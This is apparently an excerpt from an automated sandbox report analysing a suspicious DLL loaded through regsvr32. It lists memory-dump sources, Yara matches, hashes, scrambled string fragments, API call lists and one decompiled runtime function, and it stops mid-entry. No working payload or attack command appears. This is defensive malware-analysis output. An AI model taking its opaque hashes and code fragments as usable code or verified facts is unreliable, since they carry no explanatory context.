                                                                                        • Instruction Fuzzy Hash: 9B31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _unlock
                                                                                        • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                        • API String ID: 2480363372-3680694803
                                                                                        • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                        • Instruction ID: 8b5a52ed6c75746639c18038ef7af0115634e61e6ce836c346e70c61fc8f1b15
                                                                                        • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                        • Instruction Fuzzy Hash: 58510931A096828AE7F48B68EC4576E73E4F395354F618135DADD83BB4EB3EE4448B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                                                        • API String ID: 0-1298193321
                                                                                        • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                                        • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                                                        • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                                        • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                                                        • API String ID: 0-3078009748
                                                                                        • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                                        • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                                                        • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                                        • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                                        				intOrPtr _v4;
                                                                                        				void* _v12;
                                                                                        				signed long long _v24;
                                                                                        				signed int _v36;
                                                                                        				long long _v180;
                                                                                        				long long _v184;
                                                                                        				intOrPtr _v192;
                                                                                        				char _v196;
                                                                                        				intOrPtr _v204;
                                                                                        				long _v212;
                                                                                        				long long _v220;
                                                                                        				long long _v228;
                                                                                        				long long _v1212;
                                                                                        				long long _v1308;
                                                                                        				char _v1460;
                                                                                        				char _v1476;
                                                                                        				char _v1484;
                                                                                        				int _v1492;
                                                                                        				long long _v1500;
                                                                                        				long long _v1508;
                                                                                        				long long _v1516;
                                                                                        				long long _v1524;
                                                                                        				long long _v1532;
                                                                                        				long long _v1540;
                                                                                        				void* _t51;
                                                                                        				signed long long _t80;
                                                                                        				long long _t85;
                                                                                        				void* _t100;
                                                                                        
                                                                                        				_a24 = r8d;
                                                                                        				_a16 = __edx;
                                                                                        				_a8 = __ecx;
                                                                                        				_t80 =  *0xf9d4b018; // 0x6ebcb970bf84
                                                                                        				_v24 = _t80 ^ _t100 - 0x00000610;
                                                                                        				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                                                                        				E000007FE7FEF9D28D90(_t51, _a8);
                                                                                        				_v184 = 0;
                                                                                        				memset(__edi, 0, 0x94 << 0);
                                                                                        				_v1508 =  &_v196;
                                                                                        				_v1500 =  &_v1460;
                                                                                        				_v1492 = 0;
                                                                                        				_v212 = 0;
                                                                                        				__imp__RtlCaptureContext();
                                                                                        				_t85 = _v1212;
                                                                                        				_v220 = _t85;
                                                                                        				r8d = 0;
                                                                                        				0xf9d40e28();
                                                                                        				_v228 = _t85;
                                                                                        				if (_v228 == 0) goto 0xf9d2bf64;
                                                                                        				_v1516 = 0;
                                                                                        				_v1524 =  &_v1476;
                                                                                        				_v1532 =  &_v1484;
                                                                                        				_v1540 =  &_v1460;
                                                                                        				0xf9d40e22();
                                                                                        				goto 0xf9d2bf84;
                                                                                        				_v1212 = _v12;
                                                                                        				_v1308 =  &_v12;
                                                                                        				_v196 = _a4;
                                                                                        				_v192 = _a12;
                                                                                        				_v180 = _v12;
                                                                                        				_v1492 = IsDebuggerPresent();
                                                                                        				SetUnhandledExceptionFilter(??);
                                                                                        				_v212 = UnhandledExceptionFilter(??);
                                                                                        				if (_v212 != 0) goto 0xf9d2bffb;
                                                                                        				if (_v1492 != 0) goto 0xf9d2bffb;
                                                                                        				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                                                                        				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                                                        			}































                                                                                        0x7fef9d2be50
                                                                                        0x7fef9d2be55
                                                                                        0x7fef9d2be59
                                                                                        0x7fef9d2be65
                                                                                        0x7fef9d2be6f
                                                                                        0x7fef9d2be7f
                                                                                        0x7fef9d2be88
                                                                                        0x7fef9d2be8d
                                                                                        0x7fef9d2beaa
                                                                                        0x7fef9d2beb4
                                                                                        0x7fef9d2bebe
                                                                                        0x7fef9d2bec3
                                                                                        0x7fef9d2becb
                                                                                        0x7fef9d2bedb
                                                                                        0x7fef9d2bee1
                                                                                        0x7fef9d2bee9
                                                                                        0x7fef9d2bef1
                                                                                        0x7fef9d2bf04
                                                                                        0x7fef9d2bf09
                                                                                        0x7fef9d2bf1a
                                                                                        0x7fef9d2bf1c
                                                                                        0x7fef9d2bf2a
                                                                                        0x7fef9d2bf34
                                                                                        0x7fef9d2bf3e
                                                                                        0x7fef9d2bf5d
                                                                                        0x7fef9d2bf62
                                                                                        0x7fef9d2bf6c
                                                                                        0x7fef9d2bf7c
                                                                                        0x7fef9d2bf8b
                                                                                        0x7fef9d2bf99
                                                                                        0x7fef9d2bfa8
                                                                                        0x7fef9d2bfb6
                                                                                        0x7fef9d2bfbc
                                                                                        0x7fef9d2bfcd
                                                                                        0x7fef9d2bfdc
                                                                                        0x7fef9d2bfe3
                                                                                        0x7fef9d2bfed
                                                                                        0x7fef9d2c013

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                        • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                                                                        • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                        • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                                                        • API String ID: 0-1910763920
                                                                                        • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                                        • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                                                        • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                                        • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$3'p$ASN1.dll$AVx.$R@\$|7}
                                                                                        • API String ID: 0-1582836426
                                                                                        • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                                        • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                                                        • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                                        • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                                                        • API String ID: 0-950528966
                                                                                        • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                                        • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                                                        • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                                        • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$9w$IX$M?@$jS<$M
                                                                                        • API String ID: 0-1157581923
                                                                                        • Opcode ID: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                                                        • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                                                        • Opcode Fuzzy Hash: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                                                        • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$&n$1U$Oh$j/$X
                                                                                        • API String ID: 0-3716166881
                                                                                        • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                                        • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                                                        • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                                        • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                                                        • API String ID: 0-1765782432
                                                                                        • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                                        • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                                                        • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                                        • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                                                                        • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                                                                        • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 1445889803-0
                                                                                        • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                        • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                                                                        • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                        • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,bF$-Ie:$Y$jc$_
                                                                                        • API String ID: 0-2562869522
                                                                                        • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                                        • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                                                        • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                                        • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .s$/$*$89$W0$j~L
                                                                                        • API String ID: 0-3680180293
                                                                                        • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                                        • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                                                        • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                                        • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :_$DHM$J? $ioF$IE
                                                                                        • API String ID: 0-1950181368
                                                                                        • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                                        • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                                                        • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                                        • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \=V$h9&$n"$wPT$5Z3
                                                                                        • API String ID: 0-226182706
                                                                                        • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                                        • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                                                        • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                                        • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2k$5.A$h$Tv$|
                                                                                        • API String ID: 0-899094025
                                                                                        • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                                        • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                                                        • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                                        • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: `H$h$T$TaK$_
                                                                                        • API String ID: 963392458-2145750592
                                                                                        • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                                        • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                                                        • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                                        • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Bwu$L>yL${NC$^K
                                                                                        • API String ID: 0-3175627499
                                                                                        • Opcode ID: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                                        • Instruction ID: fbf4dbbb098cc7df43bbc7889590cb4d1f5602d02220e4776b40022e4a41187c
                                                                                        • Opcode Fuzzy Hash: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                                        • Instruction Fuzzy Hash: 13322B70908B488FE769CF78C48665EBBF0FB84748F204A1DE6A697270DB749945CF42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$N'}$Od^v$dS
                                                                                        • API String ID: 0-4183360357
                                                                                        • Opcode ID: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                                        • Instruction ID: 281f3f4e81126c35bb2be7146c604e5ee0be10d432db17f45780181539d507de
                                                                                        • Opcode Fuzzy Hash: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                                        • Instruction Fuzzy Hash: 3342D9B190438C8BDBB8CF64C8896DD7BF1FB48318F50852DDA199B251DBB05685CF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: +Gq$__Z%$|deb$sH
                                                                                        • API String ID: 0-2072550713
                                                                                        • Opcode ID: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                                        • Instruction ID: 26b4cb1fb47336c1432c1659c452027cf20818b998f95a2bcb6bb32f36742f2f
                                                                                        • Opcode Fuzzy Hash: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                                        • Instruction Fuzzy Hash: 0FD1137160270DCBDB68DF28C68A6DE3BE1FF48308F504129FC5A96262D774D929CB49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 5P$8r$:=$xX
                                                                                        • API String ID: 0-2901174047
                                                                                        • Opcode ID: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                                        • Instruction ID: 9c4e4b6ab2cee8fe4f9bfbf45665c48137a45671121b1b9ae43ff9fbf3dba1fc
                                                                                        • Opcode Fuzzy Hash: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                                        • Instruction Fuzzy Hash: 35E1357191034D9BCB88DF64C8899DD7BF1FB48398F516219FC4AAB260C7789585CF88
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &$Ro$X|$WW
                                                                                        • API String ID: 0-419055892
                                                                                        • Opcode ID: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                                                        • Instruction ID: 8aa2c3e6b8818245adabd520600babaa531b4d52059a868131a34f3b668756e0
                                                                                        • Opcode Fuzzy Hash: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
